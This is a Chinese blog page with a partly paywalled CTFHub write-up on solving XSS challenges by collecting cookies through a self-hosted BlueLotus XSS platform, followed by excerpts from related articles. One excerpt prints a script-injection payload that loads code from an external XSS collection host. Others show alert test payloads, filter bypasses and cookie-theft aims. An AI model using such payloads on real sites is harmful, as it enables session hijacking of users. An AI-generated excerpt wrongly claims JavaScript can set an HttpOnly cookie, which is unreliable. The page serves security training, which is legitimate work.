CTFHub技能树web之XSS

最新推荐文章于 2025-03-30 13:31:59 发布
最新推荐文章于 2025-03-30 13:31:59 发布
阅读量2.7k 收藏 23
点赞数 9
文章标签: xss 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wzhwzh123321/article/details/136262690
版权
本文讲述了如何在CTF挑战中使用XSS漏洞,通过搭建本地XSS平台(阿里云轻量服务器)或在线平台解决XSS系列题目,包括反射型、存储型、DOM反射、DOM跳转和绕过过滤机制的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在XSS系列的题目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的题目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。

由于在线XSS平台需要收费,想起自己有一个一直没用的阿里云轻量服务器,就自己搭建了一个XSS平台。如果想做这个系列的题目,可以自己搭建一个XSS接受平台或者是用在线的平台。

第一题:反射型

首先验证是否存在XSS漏洞,在上面的框中输入,页面正常回显,说明存在XSS漏洞利用

 使用蓝莲花BLUE-LOTUS的XSS接收平台能够生成payload,直接复制粘贴到第一个框中并上传,将上传后的url复制粘贴到第二个框中并点击上传,就可以收到XSS的数据了,flag就在cookie中

第二题:存储型

打开靶场,和第一题一样将payload粘贴到第一个框中并点击上传

最低0.47元/天 解锁文章
wz_fisher
关注
CTFHub靶场————XSS
qq_61579604的博客
10-17 401
写入代码查看是否出现弹窗,查看源码发现存在xss但需要闭合后才可以出现弹窗。放入脚本,使用$.getScript功能是异步加载并执行。查看脚本注意闭合(利用xss平台的脚本代码)检查是否存在弹窗,可以放在url地址栏上执行。去平台查看cookie获取flag。检测是否出现弹窗利用双写绕过过滤。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。写入代码查看是否出现弹窗。插入脚本后将网址输入。
CTFHub技能树
weixin_59480274的博客
04-23 5662
文章目录一、CTF基础知识1、CTF简介2、竞赛二、使用步骤1.引入库2.读入数据总结 一、CTF基础知识 1、CTF简介 开启题目 2、竞赛 开启题目 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ss
CTFHUB-技能树-Web题-XSS-反射型
Static______的博客
04-11 1930
参考链接:https://blog.youkuaiyun.com/weixin_43486981/article/details/107974878。特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话。输入admin后,会在页面显示,猜测可以通过该输入,改变页面内容。根据提示,把XSS平台给出的代码复制到第一个输入框中进行注入。提交后,在第二个框中访问第一个框注入XSS脚本后的网址。XSS platform平台,在上面注册一个账号。提交后,在XSS平台查看注入结果。
5分钟带你入门—CTFHub技能树(最详细教程)
最新发布
2201_75642447的博客
03-30 837
CTF(CaptureTheFlag,夺旗赛)CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。
CTFHub——XSS
2302_79119987的博客
03-28 2039
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
CTFHub技能树web——XSS——DOM反射
qq_48368964的博客
08-02 745
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中。根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式。然后去网页测试一下alert(1)反射。看到 确实存在 去xssaq.cn。
CTFHub技能树 Web-XSS 详解
weixin_45808483的博客
11-15 3907
反射型 启动环境 我们在第一个框中输入 1 ,发现 hello后多了一个 1 ,这说明我们可以通过输入来更改页面内容 我们输入弹窗测试一下,发现成功弹窗 <script>alert(/xss/)</script> 我们将更改页面后的url输入第二个框,返回Successfully,猜测在后台进行访问。 这样的话我们就可以使用XSS platform平台。 下面这篇文章中向我们演示XSS platform的攻击测试。 Web安全XSS...
题解记录-CTFHub技能树|Web|XSS,文件上传
weixin_57448435的博客
09-15 1136
xss平台使用,修改后缀名、文件头、双写绕过,%00截断,.htaccess文件理解,bp与蚁剑工具的使用
ctfhub 技能树web xss
01-10
### CTFHub Web技能树 XSS 学习路径和挑战 #### 了解XSS的基础概念 跨站脚本攻击(Cross-Site Scripting, XSS)是一种常见的Web安全漏洞,允许攻击者向其他用户的浏览器注入恶意脚本。这种类型的攻击可以分为三类:...
ctfhub技能树xss
07-28
CTFHub技能树中有关于XSS(跨站脚本攻击)的内容。XSS是一种常见的Web安全漏洞,攻击者通过注入恶意脚本来...请注意,这只是CTFHub技能树中关于XSS的一部分内容,更详细的内容需要你自己去学习和探索。祝你学习愉快!
ctfhub web技能树XSS
01-08
### 关于CTFHub Web技能树中的XSS学习路径 #### XSS简介 跨站脚本攻击(Cross-Site Scripting, XSS)是一种常见的安全漏洞,允许攻击者向其他用户的浏览器注入恶意脚本。这类攻击通常发生在Web应用程序未能正确验证...
ctfhub-技能树-xss题集全部习题详解-最新
weixin_73562787的博客
08-10 5601
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
CTFHUB技能树XSS——反射型
weixin_73049307的博客
10-19 1623
在地址栏中可以看到有GET传参,正好对应第一个输入框的CTFHub,猜测是会通过第一个输入框来影响输出的内容(有个大大的“Hello,CTFHub”)出现“successfully”,第二个输入框应该是在后台访问注入的信息。(这里我就不新建了,之前新建过了)可以看到通过该输入,改变页面内容。(一般会有声音提醒上线了)
XSS-CTFHub
Keeping it fresh at all times.
02-04 975
本文是CTFHub技能树Web系列的文章之一,重点学习了Web安全中的XSS漏洞。XSSWeb安全必学漏洞,需要多加训练、达到精通。
CTFHUB-XSS
weixin_51706044的博客
09-29 528
经过测试,第一个文本框是用于测试使用 第二个文本框应该是将信息发送至后台,进行处理, 因此我们只能是在XSS测试平台上进行获取注册成功后顺便创建一个项目,选择默认配置成功后会给一个地址 直接插入构造的url中即可这时会接受到一个信息 即可获得flag ...
ctfhubxss
小宇的web博客
05-22 1783
ctfhubxss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解题流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
CTFHub技能树web(持续更新)--XSS--反射型
jiuyongpinyin的博客
09-06 893
反射型 这道题用我自己之前搭建的xss平台没做出来,参考了别人的WP才做出来,我自己搭建的是bluelotus,但是获取的cookie不是flag,这个就不知道是为什么了,然后还有一点就是我的谷歌浏览器把弹窗屏蔽了,走了好多弯路,我就直接把参考链接给大家吧,这个链接比较做得比较详细: https://www.pianshen.com/article/52261635452/ 再次感谢大佬!!! 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
[ctfhub]-xss详解
weixin_52116519的博客
04-28 5337
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射型XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
xss跨站攻击脚本概述
xu_1234567的博客
10-28 378
1.XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 xss攻击分为三类: (1)持久型跨站(存储型xss ):最直接的危害类型,跨站代码存储在服务器(数据库) (2)非持久型跨站(反射型xss):反射型跨站脚本漏洞,最普
ctfhub技能树XSS
01-05
### CTFHub 平台上的 XSS 技能树与学习路径 #### 1. 初步理解 XSS 攻击原理 跨站脚本攻击(Cross-Site Scripting, XSS)是一种常见的Web安全漏洞,允许攻击者向其他用户的浏览器注入恶意脚本。XSS分为三种主要类型:反射型XSS、存储型XSS以及DOM-based XSS[^1]。 #### 2. 掌握基本的 HTML 和 JavaScript 编程技巧 为了能够编写有效的XSS攻击代码,掌握HTML和JavaScript的基础知识至关重要。这些技能不仅有助于理解页面结构,还能帮助构建更复杂的payloads来绕过各种防护机制[^2]。 #### 3. 实践操作环境搭建 通过访问类似CTFHub这样的在线挑战平台,可以获取实际动手练习的机会。例如,在给定的目标环境中尝试发送精心构造的数据包以触发潜在的安全问题[^3]。 #### 4. 学习并应用防御措施 了解如何防止应用程序遭受此类攻击同样重要。这包括但不限于设置HttpOnly属性保护Cookies免受JavaScript读取;采用输入验证过滤特殊字符;启用CSP(Content Security Policy)策略限制外部资源加载等方法[^4]。 ```javascript // 设置 HttpOnly Cookie 的示例 document.cookie = "session_id=abcde; path=/; HttpOnly"; ```
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值